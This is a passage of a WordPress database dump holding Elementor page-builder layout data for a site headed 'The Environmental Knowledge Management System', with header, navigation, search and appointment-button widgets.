":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2395,30,'_elementor_version','2.7.5'),(2396,34,'_elementor_controls_usage','a:0:{}'),(2753,337,'_elementor_controls_usage','a:0:{}'),(2754,339,'_elementor_controls_usage','a:0:{}'),(2776,30,'_edit_lock','1629113058:38'),(2777,345,'_elementor_controls_usage','a:0:{}'),(2778,345,'_wp_page_template','elementor_canvas'),(2779,345,'_elementor_edit_mode','builder'),(2780,345,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"zrp6yhr\",\"elType\":\"widget\",\"settings\":{\"view\":\"framed\",\"icon\":\"fa fa-map-marker\",\"title_text\":\"Street Name, FL 54785\",\"description_text\":\"Visit our Location\",\"position\":\"left\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":25},\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0},\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"title_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"ts69vjc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"oqzh1ve\",\"elType\":\"widget\",\"settings\":{\"view\":\"framed\",\"icon\":\"fa fa-phone\",\"title_text\":\"(01) 54 214 951 47\",\"description_text\":\"Call us Anytime\",\"position\":\"left\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":25},\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0},\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"title_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"css_classes\":\"hide-1024\"},\"elements\":[{\"id\":\"u5e2u0j\",\"elType\":\"widget\",\"settings\":{\"text\":\"Make an Appointment\",\"align\":\"right\",\"icon\":\"fa fa-bell-o\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_font_family\":\"Open Sans\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#01aef0\",\"background_color\":\"#ffffff\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#01aef0\",\"button_hover_border_color\":\"#01aef0\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#002060\",\"border_radius\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"14\",\"right\":\"24\",\"bottom\":\"14\",\"left\":\"24\",\"isLinked\":false},\"link\":{\"url\":\"\\/contact-us\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#364e66\",\"css_classes\":\"owp-sticky\"},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ygq48oz\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"structure\":\"20\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"xq1wmgu\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.016,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"70skryu\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true},{\"id\":\"bnnwd77\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.984,\"_inline_size_tablet\":25,\"css_classes\":\"hide-tablet-mobile\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"us3x62m\",\"elType\":\"widget\",\"settings\":{\"width\":{\"unit\":\"%\",\"size\":100},\"height\":{\"unit\":\"px\",\"size\":30},\"placeholder\":\"Type your search...\",\"input_bg\":\"#ffffff\",\"input_border_border\":\"solid\",\"input_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"input_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"newsletter_input_typography\":\"custom\",\"newsletter_input_font_size\":{\"unit\":\"px\",\"size\":12},\"newsletter_input_font_style\":\"italic\",\"icon_size\":{\"unit\":\"px\",\"size\":16},\"icon_position\":{\"unit\":\"px\",\"size\":10},\"results_border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"no_results_text_typo_typography\":\"custom\",\"no_results_text_typo_font_size\":{\"unit\":\"px\",\"size\":13},\"no_results_text_typo_line_height\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"oew-search\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2781,345,'_elementor_version','0.4'),(2783,346,'_elementor_controls_usage','a:0:{}'),(2784,346,'_wp_page_template','elementor_canvas'),(2785,346,'_elementor_edit_mode','builder'),(2786,346,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"zrp6yhr\",\"elType\":\"widget\",\"settings\":{\"view\":\"framed\",\"icon\":\"fa fa-map-marker\",\"title_text\":\"Street Name, FL 54785\",\"description_text\":\"Visit our Location\",\"position\":\"left\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":25},\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0},\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"title_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"ts69vjc\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"oqzh1ve\",\"elType\":\"widget\",\"settings\":{\"view\":\"framed\",\"icon\":\"fa fa-phone\",\"title_text\":\"(01) 54 214 951 47\",\"description_text\":\"Call us Anytime\",\"position\":\"left\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":25},\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0},\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"title_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"css_classes\":\"hide-1024\"},\"elements\":[{\"id\":\"u5e2u0j\",\"elType\":\"widget\",\"settings\":{\"text\":\"Make an Appointment\",\"align\":\"right\",\"icon\":\"fa fa-bell-o\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_font_family\":\"Open Sans\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#01aef0\",\"background_color\":\"#ffffff\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#01aef0\",\"button_hover_border_color\":\"#01aef0\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#002060\",\"border_radius\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"14\",\"right\":\"24\",\"bottom\":\"14\",\"left\":\"24\",\"isLinked\":false},\"link\":{\"url\":\"\\/contact-us\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#364e66\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ygq48oz\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"xq1wmgu\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"70skryu\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2787,346,'_elementor_version','0.4'),(2789,30,'_elementor_template_type','wp-post'),(2797,348,'_wp_page_template','elementor_canvas'),(2798,348,'_elementor_edit_mode','builder'),(2799,348,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":16.639,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":55,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"The Environmental Knowledge Management System\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":44,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":28.357,\"css_classes\":\"hide-1024\"},\"elements\":[{\"id\":\"u5e2u0j\",\"elType\":\"widget\",\"settings\":{\"text\":\"Make an Appointment\",\"align\":\"right\",\"icon\":\"fa fa-bell-o\",\"icon_indent\":{\"unit\":\"px\",\"size\":8},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_font_family\":\"Open Sans\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#01aef0\",\"background_color\":\"#ffffff\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#01aef0\",\"button_hover_border_color\":\"#01aef0\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"#002060\",\"border_radius\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"14\",\"right\":\"24\",\"bottom\":\"14\",\"left\":\"24\",\"isLinked\":false},\"link\":{\"url\":\"\\/contact-us\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(2800,348,'_elementor_version','2.7.5'),(2801,348,'_elementor_template_type','wp-post'),(2813,350,'_wp_page_template','elementor_canvas'),(2814,350,'_elementor_edit_mode','builder'),(2815,350,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":16.639,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":55,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"The Environmental Knowledge Management System\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":44,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4n8x0v8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":28.357,\"css_classes\":\"hide-1024\"},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),